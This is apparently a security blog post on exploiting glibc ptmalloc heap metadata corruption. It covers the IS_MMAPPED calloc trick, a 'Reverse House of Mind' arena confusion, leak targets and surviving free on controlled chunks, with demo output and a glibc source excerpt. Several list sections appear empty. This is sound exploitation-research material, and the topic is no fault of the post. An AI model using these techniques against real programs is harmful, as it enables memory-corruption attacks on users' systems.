scraps of notes on ptmalloc metadata corruptions

Welcome to the third episode of the ptmalloc fanzine. This will be a shorter one, a collection of notes concerning the exploitation of heap corruptions in a ptmalloc/Linux environment that don’t warrant their own episode.

TLDR

We touch on the following subjects:

As usual, glibc source links and platform-dependent information all pertain to Ubuntu 16.04 on x86-64, unless stated otherwise.

Forcing calloc to return unitialized memory

There’s a special case in calloc for when _int_malloc returns an mmapped chunk. Those are assumed to be zeroed, so memsetting them isn’t needed. _int_malloc ignores the IS_MMAPPED bit, so setting it for a chunk already in the freelist by corruption, then requesting a calloc of that size won’t cause problems, and calloc will skip the memset, returning uninitialized data. This might be useful to leak addresses or other sensitive information and to ease the exploitation of some use-after-free bugs. The victim chunk can be in the fastbins, smallbins or the unsorted bin but the rounded request-size has to be an exact match for the size of the victim chunk. Otherwise, the malloc code will set the size of the returned chunk explicitly, clearing the IS_MMAPPED bit as a side-effect. Running the uninitialized_calloc.c example shows this in action:

tukan@farm:/ptmalloc-fanzine/03-scraps$ ./uninitialized_calloc
allocated victim chunk with requested size 0x100, victim->size == 0x111
allocated another chunk to prevent victim from being coalesced into top
freeing victim chunk
emulating corruption of the IS_MMAPPED bit of victim->size
making a calloc request for an exact size match
the first 2 qwords of the returned region:
0x7ffff7dd1c78 0x7ffff7dd1c78
tukan@farm:/ptmalloc-fanzine/03-scraps$ 

Reverse House of Mind

The House of Mind starts by growing the brk heap above a heap size boundary so that setting the NON_MAIN_ARENA bit of a chunk will result in free looking for the corresponding arena in attacker-controlled data. The NON_MAIN_ARENA bit can be of interest the other way around, by clearing it for a chunk in an mmapped heap before freeing it. Free will enter it into the freelists of the main arena, making it possible to have mallocs from the main arena return chunks in other arenas. This may be useful in situations where e.g. there are worker threads with vulnerable buffers but no worthwhile targets on their heaps and a main thread which allocates/deallocates interesting objects. The reverse_mind.c example shows this:

tukan@farm:/ptmalloc-fanzine/03-scraps$ ./reverse_mind
brk heap is around: 0x55e1915bd010
allocated victim chunk in thread arena with requested size 0x40, victim->size == 0x55
emulating corruption of the NON_MAIN_ARENA bit of victim->size
freeing victim chunk, entering it into a fastbin of the main arena
making a malloc request in the main thread
the address of the chunk returned in the main thread: 0x7fab500008c0

However, this will only work for fastbin-sized chunks. Others will fail the next chunk arena boundary checks, since mmapped heaps are way up higher in the address space than the brk heap. While this may be circumvented by spraying the address space with large mappings so that an mmapped heap ends up below the brk heap, it doesn’t really seem to worth the trouble.

HITCON 2016 qualifier

This year’s HITCON qual had some really nice heap exploitation challenges, here’s a very short synopsis of the tricks required for some of them:

Conjuring addresses for leaks

Free chunks may contain different addresses in their bk and fd members, depending on their size and position in the freelist, which make them appealing targets for leaks:

Some other directions:

Corruption targets in libc

Libc has a lot of interesting targets for corruption:

Surviving free on controlled data

There are cases when you already did all the necessary corruptions but there are still a couple of free calls, possibly on corrupted chunks, before control flow is hijacked. Setting up a region on which free will operate without crashing isn’t a really difficult task:

uintptr_t block = (uintptr_t) p - p->prev_size;
size_t total_size = p->prev_size + size;

if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
  {
    malloc_printerr (check_action, "munmap_chunk(): invalid pointer", chunk2mem (p), NULL);
    return;
  }

The only thing needed is the offset of our chunk into its page, then it’s possible to use the prev_size field to point block outside the mapped ranges and ensure page-alignment and the size field to make the total_size value small. Since there’s no check on the return value of munmap, we’re good to go.

Closing words

That’s about it, hope you found this educational. As usual, comments of any nature are welcome, hit me up on freenode or twitter.

Special thanks to gym again for the rigorous proofreading.